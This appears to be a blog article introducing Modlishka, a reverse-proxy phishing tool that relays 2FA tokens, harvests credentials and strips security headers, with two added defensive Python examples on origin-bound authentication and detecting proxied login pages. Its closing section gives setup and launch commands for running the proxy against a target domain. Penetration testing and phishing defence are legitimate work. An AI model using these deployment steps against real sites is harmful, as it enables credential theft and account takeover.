Modlishka is a powerful reverse proxy tool for running phishing campaigns. It is useful to pentesters because it demonstrates current 2FA weaknesses (it can bypass 2FA protection on popular websites such as Gmail and Yahoo) and helps you find and implement adequate security solutions.
Modlishka: Powerful Reverse Proxy, Phishing NG, Bypassing 2FA
Modlishka is written in Go and allows you to carry out an effective phishing campaign. According to the official documentation, you can adjust the configuration for your chosen domain; the reverse proxy can be customized through a set of command line options or JSON configuration files.
Modlishka is able to trick 2FA systems by collecting 2FA tokens without using fake templates (you just need to point it at the target domain). To start pentesting/phishing with Modlishka, all you need is a TLS certificate and a phishing domain.
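The reason a relayed 2FA token works is that nothing in a one-time code ties it to the site the user typed it into; the proxy forwards it and the real site accepts it. The defence that survives this is a second factor bound to the origin the browser actually talked to. The following Python example is added here for illustration and is not part of the original post or of Modlishka: it mirrors the type, challenge and origin checks a WebAuthn relying party performs on the client data before looking at a signature. The origin "https://accounts.example.com", the challenges and the helper that builds the client data are constructed sample values.

```python
import base64
import hmac
import json

# The relying party's genuine origin (constructed sample value).
RP_ORIGIN = "https://accounts.example.com"


def b64url_decode(s: str) -> bytes:
    """Decode base64url without padding, as used in WebAuthn client data."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def verify_client_data(client_data_b64url: str, expected_challenge: str,
                       rp_origin: str = RP_ORIGIN):
    """Return (ok, reason) for an authentication assertion's clientDataJSON.

    These are the relying-party checks that make the factor origin-bound:
    the browser, not the user, fills in the origin field, so a token produced
    on a look-alike domain carries that domain and is rejected here.
    """
    data = json.loads(b64url_decode(client_data_b64url))
    if data.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    # Constant-time compare against the challenge issued for this session;
    # a replayed or foreign challenge fails regardless of origin.
    if not hmac.compare_digest(str(data.get("challenge", "")), expected_challenge):
        return False, "challenge mismatch (replay or wrong session)"
    if data.get("origin") != rp_origin:
        return False, f"origin {data.get('origin')!r} is not the relying party"
    return True, "ok"


def make_client_data(origin: str, challenge: str) -> str:
    """Build a simplified clientDataJSON the way a browser would (constructed
    helper for the examples below; a real browser adds further fields)."""
    payload = {"type": "webauthn.get", "challenge": challenge, "origin": origin}
    raw = json.dumps(payload).encode()
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


if __name__ == "__main__":
    # Direct login: origin matches, challenge matches -> accepted.
    print(verify_client_data(make_client_data(RP_ORIGIN, "chal-1"), "chal-1"))
    # The same ceremony run on a look-alike domain -> rejected on origin.
    print(verify_client_data(
        make_client_data("https://accounts.example-login.test", "chal-1"), "chal-1"))
```

Compare this with a TOTP or SMS code check, which is a plain comparison of two strings: it has no origin field to inspect, which is exactly why such codes can be relayed through a proxy while an origin-bound assertion cannot.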
- Support for majority of 2FA authentication schemes (by design).
- No website templates (just point Modlishka to the target domain – in most cases, it will be handled automatically).
- Full control of "cross" origin TLS traffic flow from your victims' browsers (through custom new techniques).
- Flexible and easily configurable phishing scenarios through configuration options.
- Stripping the website of all encryption and security headers (back to 90's MITM style).
- User credential harvesting (with context based on URL parameter passed identifiers).
- Can be extended with your ideas through plugins.
- Stateless design. Can be scaled up easily for an arbitrary number of users – ex. through a DNS load balancer.
- Web panel with a summary of collected credentials and user session impersonation (beta).
- Backdoor free.
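Two items in this list give a defender something concrete to look for when triaging a reported login page: the page is served from a host other than the real one, and the security headers the real site always sends are gone. The Python example below is an added illustration, not code from the original post or from Modlishka. It audits a captured response against the legitimate origin; the hosts, headers and HTML bodies are constructed samples, and the expected-header list is an assumption about what the genuine site sends.

```python
import re
from dataclasses import dataclass

# Headers the legitimate site is assumed to send on every response
# (constructed assumption for this example). Their absence on a page that
# claims to be that site is a sign the response passed through something
# that stripped them.
EXPECTED_HEADERS = (
    "strict-transport-security",
    "content-security-policy",
    "x-frame-options",
)


@dataclass(frozen=True)
class Finding:
    severity: str   # "high" or "medium"
    message: str


def audit_response(expected_host, observed_host, headers, body):
    """Compare a captured login page with what the real origin should look like.

    Returns a list of Finding objects; an empty list means nothing deviated.
    """
    findings = []
    lowered = {k.lower(): v for k, v in headers.items()}

    # 1. The page must come from the real host, not a look-alike.
    if observed_host.lower() != expected_host.lower():
        findings.append(Finding("high", f"page served from {observed_host}, expected {expected_host}"))

    # 2. Security headers the real site always sends must still be present.
    for name in EXPECTED_HEADERS:
        if name not in lowered:
            findings.append(Finding("medium", f"missing {name} header"))

    # 3. A relaying proxy has to point the login form at itself; any form
    #    whose absolute action is not the real host is flagged.
    for target in re.findall(r'<form[^>]*\saction="https?://([^/"]+)', body, re.IGNORECASE):
        if target.lower() != expected_host.lower():
            findings.append(Finding("high", f"login form posts to {target}"))
    return findings


def verdict(findings):
    """Reduce findings to a one-word triage result."""
    if any(f.severity == "high" for f in findings):
        return "suspicious"
    return "degraded" if findings else "clean"


# Constructed samples: the genuine page and the same page as a victim would
# receive it through a relaying proxy on a look-alike domain.
REAL_HOST = "accounts.example.com"
LEGIT_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
    "Content-Type": "text/html",
}
LEGIT_BODY = '<html><body><form method="post" action="https://accounts.example.com/login"></form></body></html>'
PROXIED_HOST = "accounts.example-login.test"
PROXIED_HEADERS = {"Content-Type": "text/html"}
PROXIED_BODY = '<html><body><form method="post" action="https://accounts.example-login.test/login"></form></body></html>'


def audit_legit():
    return audit_response(REAL_HOST, REAL_HOST, LEGIT_HEADERS, LEGIT_BODY)


def audit_proxied():
    return audit_response(REAL_HOST, PROXIED_HOST, PROXIED_HEADERS, PROXIED_BODY)


if __name__ == "__main__":
    for label, findings in (("direct", audit_legit()), ("relayed", audit_proxied())):
        print(label, verdict(findings))
        for f in findings:
            print("  ", f.severity, f.message)
```

The host check is the one that matters most: a relaying proxy can forward a perfect copy of the page, but it cannot serve it from the real domain, so user-awareness training and URL-based mail filtering should key on the host rather than on how the page looks.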
Prerequisites (to run an effective phishing campaign):
- Registered domain name
- Wildcard SSL certificate
First of all, fetch the source code with:
$ go get -u github.com/drk1wi/Modlishka
Then generate the root CA key and certificate:
$ openssl genrsa -out MyRootCA.key 2048
$ openssl req -x509 -new -nodes -key MyRootCA.key -sha256 -days 1024 -out MyRootCA.pem
- Replace the const CA_CERT variable with the content of the MyRootCA.pem file and the const CA_CERT_KEY with the content of the MyRootCA.key file.
- Install the 'MyRootCA' CA (the MyRootCA.pem file) in your browser's certificate store (Firefox, Chrome) and set the right trust level for it.
Finally, compile and launch:
$ make
$ sudo ./dist/proxy -config templates/google.com_gsuite.json
To list available options, simply use:
./dist/proxy -h
Usage of ./dist/proxy:
  -cert string
        base64 encoded TLS certificate
  -certKey string
        base64 encoded TLS certificate key
  -certPool string
        base64 encoded Certification Authority certificate
  -config string
        JSON configuration file. Convenient instead of using command line switches.
  -credParams string
        Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)
  -debug
        Print debug information
  -disableSecurity
        Disable security features like anti-SSRF. Disable at your own risk.
  -jsRules string
        Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
  -listeningAddress string
        Listening address (default "127.0.0.1")
  -listeningPort string
        Listening port (default "443")
  -log string
        Local file to which fetched requests will be written (appended)
  -phishing string
        Phishing domain to create - Ex.: target.co
  ...
The following command will launch the proxy without any encryption:
$ sudo ./dist/proxy -target https://target-domain.com -phishingDomain loopback.modlishka.io -listeningPort 80
- target parameter: the domain that should be proxied,
- phishingDomain: defines the phishing domain.
DEMO: Phishing with Modlishka (author: @drk1wi)
For a more detailed usage guide, see the project's documentation.